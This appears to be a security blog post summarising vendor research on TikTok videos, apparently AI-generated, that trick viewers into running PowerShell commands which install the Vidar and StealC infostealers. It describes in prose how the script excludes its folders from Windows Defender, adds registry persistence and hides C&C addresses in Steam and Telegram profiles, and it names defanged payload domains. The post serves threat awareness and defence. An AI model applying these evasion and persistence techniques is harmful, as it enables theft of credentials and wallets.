TikTok Used as a Malware Delivery Tool: AI-Generated Videos Trick Users into Downloading Infostealers

Cybercriminals have found a new playground—and it’s none other than TikTok. In a clever and alarming twist, attackers are exploiting the platform’s viral nature by sharing instructional videos designed to trick users into running malicious PowerShell commands. These aren’t just ordinary scam clips—they appear AI-generated, perfectly mimicking tutorial-style content to mask their real purpose: the distribution of dangerous malware such as Vidar and StealC.

This new campaign marks a disturbing evolution in cyberattacks, shifting the battlefield from phishing emails and fake websites to dynamic video content and social platforms. The hackers’ goal is simple yet effective: convince unsuspecting users to execute commands that compromise their devices and exfiltrate sensitive data. This development underlines the need for greater vigilance, user education, and proactive cybersecurity strategies tailored to the age of algorithm-driven social manipulation.

TikTok’s Viral Threat: AI Videos Spreading Malware Through PowerShell

A recent investigation by Trend Research revealed a highly targeted and dangerous malware campaign that weaponizes TikTok to spread infostealers like Vidar and StealC. This isn’t your average phishing trick—it involves AI-generated videos posing as software activation tutorials that instruct viewers to run PowerShell commands. These commands silently download and execute malicious scripts on users’ systems, bypassing traditional security measures.

These deceptive videos have proven alarmingly effective, with one tutorial racking up nearly 500,000 views and over 20,000 likes. The accounts responsible, such as @gitallowed, @allaivo2, and @digitaldreams771, have since been deactivated. However, the scale and sophistication of the campaign suggest automation and AI were heavily used to produce near-identical content across multiple accounts.

Once executed, the PowerShell script downloads malware hosted on sites like allaivo[.]me and amssh[.]co. The script creates hidden directories, evades Windows Defender by excluding those paths, and ensures persistence by adding startup registry keys. Payloads are either Vidar or StealC—two notorious infostealers capable of capturing browser data, login credentials, crypto wallet info, and more.

Even more concerning is the use of legitimate platforms like Steam and Telegram as command-and-control (C\&C) infrastructure, which makes these campaigns harder to detect. Vidar, for instance, hides C\&C IPs within Steam profile bios and Telegram messages, bypassing traditional detection methods that scan for suspicious domains or files.

The technical breakdown of this campaign illustrates a new form of malware distribution where no malicious content is embedded in the video itself. Instead, the visual and auditory content persuades users to voluntarily compromise their own devices.

Security implications for businesses and individuals are profound. Organizations must rethink their strategies—relying solely on signature-based detection or link analysis is no longer sufficient. Behavioral analysis, social media monitoring, and advanced user awareness training are essential defenses in this evolving threat landscape.

Trend Vision One™, an AI-powered security platform, is equipped to detect these campaigns and offers tools for threat hunting, incident response, and proactive defense. Users of the platform can access detailed indicators of compromise (IOCs), real-time threat intelligence, and customized hunting queries to mitigate exposure.

Ultimately, the viral nature of TikTok, combined with AI-powered deception, has opened a new chapter in cyber warfare—one that merges entertainment, automation, and malicious intent.

What Undercode Say:

This campaign marks a defining moment in how malware is spread. The pivot to using video content, especially on platforms like TikTok, highlights a sophisticated understanding of both social media dynamics and human psychology. Threat actors are no longer simply pushing malware through malicious links or phishing emails—they are now using entertainment and visual persuasion to bypass our digital defenses.

At the core of this campaign is the manipulation of user trust. Instructional videos have become a trusted format for learning new tools, hacks, and tricks. By mimicking this format with AI-generated content, attackers blend into a sea of harmless tutorials. The malicious commands seem credible, especially to non-technical users who might not recognize PowerShell or understand the risks of running terminal commands from unknown sources.

The use of AI-generated voices and faceless accounts further dehumanizes the source, making the video feel neutral and professional. Automation likely played a large role in generating numerous versions of the same video, each slightly altered to avoid detection and expand the attack surface.

This isn’t just a cybersecurity issue—it’s a sociotechnical problem. As platforms like TikTok blur the lines between entertainment and instruction, users need stronger education on digital hygiene. Visual persuasion can override caution, especially when the instructions appear simple, helpful, and promising free software.

From a technical standpoint, the attack is brilliantly constructed. By having users execute the commands themselves, malware delivery bypasses many endpoint detection systems. There’s no phishing link to scan, no suspicious attachment to filter—just a user voluntarily installing malware while believing they’re unlocking features or activating software.

The command chain is deeply concerning. Attackers start by manipulating Windows Defender to exclude malicious folders from scans, essentially blinding local protection tools. From there, they establish persistence, hide their tracks, and maintain control through C\&C servers cleverly masked as legit online services.

Corporate environments are particularly vulnerable. If one employee follows such a video at home and connects their infected device to a company network—or worse, runs the command on a work computer—the potential for data breaches multiplies. This campaign isn’t just about personal devices. It’s a scalable strategy that can impact large networks.

Social media threat monitoring and behavioral detection must now become standard practice. Organizations need to look beyond traditional antivirus solutions and begin investing in platforms that understand user context, track system behavior over time, and identify anomalies such as suspicious PowerShell usage.

Moreover, regulatory bodies may eventually need to step in. As AI-generated media becomes indistinguishable from real human content, platforms like TikTok must be held accountable for identifying and removing malicious instructional content. This is a new kind of cyber threat—visually coded, emotionally targeted, and algorithmically spread.

Fact Checker Results ✅

Verified: AI-generated TikTok videos are being used to spread Vidar and StealC malware.
Confirmed: Victims are socially engineered into executing PowerShell commands themselves.
Validated: Trend Micro’s tools, including Trend Vision One™, can detect and mitigate these threats. 🔍🛡️⚠️

Prediction 🔮

As attackers see success with TikTok-based malware distribution, similar campaigns will likely emerge on Instagram Reels, YouTube Shorts, and Facebook Stories. Expect future iterations to use deepfake presenters, enhanced AI-generated voices, and even chat-based interfaces to boost credibility. Businesses must brace for a future where video is no longer just entertainment—it’s the new frontline in cyberattacks.